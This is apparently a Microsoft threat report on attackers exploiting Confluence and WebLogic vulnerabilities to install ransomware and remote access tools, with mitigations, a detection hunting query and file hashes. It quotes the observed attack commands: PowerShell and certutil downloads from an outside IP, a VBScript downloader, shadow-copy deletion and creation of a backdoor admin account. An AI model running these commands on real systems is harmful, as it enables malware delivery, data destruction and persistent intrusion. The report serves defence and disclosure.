Confluence and WebLogic abuse

As early as April 10, 2019, unidentified attackers began leveraging new vulnerabilities in popular enterprise applications to deliver a wide variety of malware, including ransomware, coin miners, and remote access tools. These applications are typically deployed on internet-facing servers, making them obvious targets for entry.

The campaign operators used two recently disclosed vulnerabilities to gain access to target networks. First, they used a vulnerability in Atlassian Confluence Server (CVE-2019-3396), a Java-based enterprise collaboration suite. Later, on April 16, they began using a vulnerability in Oracle WebLogic Server (CVE-2019-2725), a Java EE application server.

Due to the variety of implants and delivery methods, coupled with consistent infrastructure and TTPs, we believe that these campaigns were carried out by affiliated but independent operators.

These campaigns mostly impacted organizations in the United States, coinciding with Confluence and WebLogic installs. Intrusions were exacerbated by inadequate security measures, including direct access to vulnerable servers from the internet and non-adherence to the principle of least privilege. In many cases, attackers could have established persistent access, because vulnerable services were running in the context of highly privileged accounts.

Confluence and WebLogic abuse

Table of Contents

Arrival

To initiate the campaigns, attackers first attempted to locate vulnerable instances of Confluence Server or Oracle WebLogic Server. Confluence Server, which is written in Java, typically runs in a Java EE application server environment, such as Apache Tomcat, Jboss, or Oracle WebLogic. Attackers connected from a number of IP addresses, most of which were observed only a few times, although some IP addresses were used consistently over several days.

Malware delivery and installation

Immediately following exploitation, Microsoft observed multiple methods used during the installation phase.

PowerShell wget

Attackers executed the PowerShell “wget” cmdlet (an alias for Invoke-WebRequest) to download a file from a remote location.

cmd.exe /c powershell.exe wget http[:]//188.166.74.218/fox.exe -outfile %TEMP%/fox.exe

This method triggered two behavioral detections, Suspicious behavior by cmd.exe was observed and Suspicious PowerShell commandline.

Certutil.exe abuse

Attackers leveraged unintended functionality in Certutil.exe, a Windows Certificate Services utility, to download a file from a remote location.

certutil.exe -urlcache -split -f http[:]//188.166.74.218/ment.exe C:\Users\\AppData\Local\Temp\2/ment.exe 

This method triggered the detection Use of living-off-the-land binary to run malicious code.

Malicious VBScript

Attackers wrote a malicious Visual Basic script line-by-line using cmd.exe “echo” commands, then executed the script. The VBScript (excerpt shown below) in turn downloaded a file from a remote site.

cmd /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>%tmp%\malicious.vbs  
&@echo objXMLHTTP.open "GET","http[:]//188.166.74.218/office.exe",false>>%tmp%\malicious.vbs
...

This method triggered the detection HTTP object allocation in VBScript.

Post-installation activity

Follow-on activity varied depending on the payload delivered. In some cases, the attackers installed ransomware, including the infamous Gandcrab family as well as a new family dubbed “Sodinokibi”. In these cases, the malware connected to command-and-control endpoints and then conducted expected ransomware activities, such as deleting Volume Shadow Copies and disabling system recovery options:

"cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet  
& bcdedit /set {default} recoveryenabled No
& bcdedit /set {default} bootstatuspolicy ignoreallfailures

In other cases, follow-on activities were not observed, likely because the malware was removed by Windows Defender Antivirus.

Persistence

In most observed intrusions, attackers could have easily set up persistent access because the application server (either WebLogic itself or the platform running Confluence) was running under a privileged account, such as SYSTEM. This presents an extreme risk of compromise to highly-privileged domain accounts whose credentials may be present on the server. Some observed persistence methods included:

  • Installing a web shell on the webserver
  • Installing a cmd.exe-based backdoor
  • Creating new user accounts and adding them to the local administrators group
net  user www Qw112233!! /add 
net localgroup administrators www /add

Because of the variety of implants and delivery methods, coupled with consistent infrastructure and TTPs, Microsoft security researchers believe that the campaigns were carried out by affiliated but independent operators.

Impact

The campaign compromised approximately 700 computers globally, about two-thirds of which were located in the United States, which coincides with the global distribution of Oracle WebLogic Server and Confluence Server installs according to open-source research. Based on this finding, we believe that these attacks were not particularly targeted against any geographic area. We also do not see evidence of targeting by industry vertical.

Confluence and WebLogic abuse

Mitigations

Apply these mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

  • To address exploits related to this threat, mitigate the following vulnerabilities: CVE-2019-2725CVE-2019-3396.
  • Check your perimeter firewall and proxy to:
    • Limit access to servers from the internet. In enterprise environments, access to line-of-business web applications should be restricted to VPN users.
    • Restrict servers from making arbitrary connections to the internet. This inhibits malware downloads and command-and-control (C&C) activity.
  • Practice the principle of least-privilege. In most cases, it is unnecessary to run Oracle WebLogic Server or platforms running Confluence Server as “SYSTEM” or as an administrator.
  • Maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
  • Turn on cloud-delivered protection and automatic sample submission on Windows Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Avoid the use of domain-wide, admin-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.

Detection details

Antivirus

Windows Defender Antivirus detects multiple malware components associated with this threat. These components are identified using next-generation antivirus capabilities, including machine learning and behavioral detection, leading to overlapping detections, particularly of first-seen components and polymorphic variants. The detection names are listed here for reference, but related alerts are not actively monitored.

  • Trojan:Win32/Gandcrab
  • Ransom:Win32/Sodinokibi
Endpoint detection and response (EDR)

Alerts with the following titles in the Microsoft Defender Security Center portal can indicate threat activity on your network.

Specific to this threat
  • Ransomware associated with an exploitation campaign
Generic and unmonitored
  • HTTP object allocation in VBScript
  • Suspicious behavior by cmd.exe was observed
  • Suspicious Powershell commandline
  • Use of living-off-the-land binary to run malicious code
Attack surface reduction rules

These rules can block or audit activity associated with this threat:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criterion
  • Block JavaScript or VBScript from launching downloaded executable content
  • Block credential stealing from the Windows local security authority subsystem (lsass.exe)
  • Use advanced protection against ransomware
Advanced hunting

The following query can be used to reveal and investigate activity described in this report:

ProcessCreationEvents
| where EventTime >= ago(7d)
| where
// "Grandparent" process is Oracle WebLogic or some process loading Confluence
InitiatingProcessParentFileName == "beasvc.exe" or
InitiatingProcessFileName == "beasvc.exe"
or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
(
    FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
    // Omit known clean processes
    and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
    and ProcessCommandLine !contains "ApplicationNo"
    and ProcessCommandLine !contains "CustomerGroup"
    and ProcessCommandLine !contains "Cosmos"
    and ProcessCommandLine !contains "Unrestricted"
    and
    (
        ProcessCommandLine contains "$" // PowerShell variable declaration
        or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
        or ProcessCommandLine contains "encodedcommand"
        or ProcessCommandLine contains "wget"
        //or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
    )
)
or
(
    FileName =~ "cmd.exe" // cmd.exe is spawned
    and ProcessCommandLine contains "@echo" and
    ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
    FileName =~ "certutil.exe" // CertUtil.exe abuse
    and ProcessCommandLine contains "-split"
    // the "-split" parameter is required to write files to the disk
)
| project
       EventTime,
       InitiatingProcessCreationTime ,
       MachineId ,
       Grandparent_PID = InitiatingProcessParentId,
       Grandparent = InitiatingProcessParentFileName,
       Parent_Account = InitiatingProcessAccountName,
       Parent_PID = InitiatingProcessId,
       Parent = InitiatingProcessFileName ,
       Parent_Commandline = InitiatingProcessCommandLine,
       Child_PID = ProcessId,
       Child = FileName ,
       Child_Commandline = ProcessCommandLine

Indicators

Files (SHA-1)
  • 1399bf98a509adb07663476dee7f9fee571e09f3
  • d514d08571ecd8cece8d704adc8d0c4fa87665ca
  • 3c3e6438278f1c0cc6ef53057f0b5d7c5038b599
  • 70f2bc8cc0861dc5ff4590821d67ac34272c929a
  • fc3de60132abbacc6dc55d1ddeeca3f46d88e523
  • f7f4bb61991a05a437443ec33c9cbe86a34e5beb
  • 736eb0f27220929ea118adbb92bebb83631fc8da
  • e2b507e5131eb04525bd6aea5663937d99191743
  • 0cf736b2456bc99e6ec340d4f9be28aca809c5d0
  • de44ed2456c8057f7897a1bd197a0854cc24917b
  • 18bca42b02e1e033207e8653e0658a9eff461a11
  • 984d3139903eb73a619074ad26b9c662f6d31d92
  • 9b6af31a086cd9fd5bf305c2182a47729b79a3f8
  • f69f954699eaabec17a0157ed3503e7ee2ae8474
  • c36649a63ddfb3b080c1c91e7b7098ffe50db26e
  • 4fdad035b2e42a005f6c58768d01a021d2ebf7d8
  • f1ea0a57de221e490ae42dc009610901c1eb933f
  • a9ff544897283b34ba8deabe5676016488c9dec5
  • 47fa7f7971d286932a25241d1a210989665e9dd9
  • a7ce69ae60f5a711f5bfd7f75da7bcd2cc034b20
  • 63af9bcf9a07caa2f166bce8f66808b854f75899
  • b6304984dc3cce682e05271496bdb59b9b1e8444
  • b56e5fcc004216bae0fdc14095c858922826e698
  • c021dc849b7e5af5d94f60127e179a1d426d02d3

References